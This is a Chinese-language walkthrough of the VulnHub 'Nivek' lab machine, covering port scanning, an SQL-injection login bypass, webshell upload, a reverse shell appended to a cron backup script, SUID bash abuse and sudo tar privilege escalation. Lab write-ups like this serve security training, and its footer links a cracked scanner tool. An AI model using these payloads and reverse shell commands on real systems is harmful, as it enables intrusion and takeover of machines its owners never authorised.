Vulnhub_Nivek

Posted NowSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub_Nivek相关的知识,希望对你有一定的参考价值。


主机信息

kali:192.168.3.28
nivek:192.168.3.31

信息收集

通过nmap探测目标主机发现开放了21、22、7080三个端口

nmap -T4 -A -v -p- 192.168.3.31


访问7080端口是一个后台登录界面

尝试使用万能密码进行登录

'OR 1=1 # 
'OR 1=1 --


由于前端对input输入框做了类型限制,所以删除用户名input的type即可进行正常输入

成功进入后台

通过查看后台首页原密码,发现一个被注释的设置页面,访问后可以对该网站做一些配置

GETSHELL

选择木马进上传

查看上传后的文件路径

访问上传的木马后反弹回一个shell

将检测脚本下载到目标主机

执行检测脚本并将结果输出到1.txt,但是tmp目录下无法查看

然后查看nivek的家目录找到一个flag

提权

查找具有suid权限的程序,发现eren具有bash的suid权限

执行/usr/bin/bash -p后具有了

进入eren的家目录后发现一个备份脚本

查看定时任务发现每5分钟会进行一次自动备份

然后将bash反弹shell的命令追加到备份脚本中

echo "bash -i >& /dev/tcp/192.168.3.30/1234 0>&1" >> backup.sh


大约5分钟左后会返回一个eren权限的shell

执行官sudo -l发现tar命令可以进行提取

执行提取命令进行提权

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh


进入root目录查看flag

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

以上是关于Vulnhub_Nivek的主要内容,如果未能解决你的问题,请参考以下文章

bzoj 3786 星系探索 dfs+splay

BZOJ3786星系探索 DFS序+Splay

小王子中 小王子 去过几个星球

《网络¥安全联盟站》——星球周报

《网络¥安全联盟站》——星球周报

《网络¥安全联盟站》——星球周报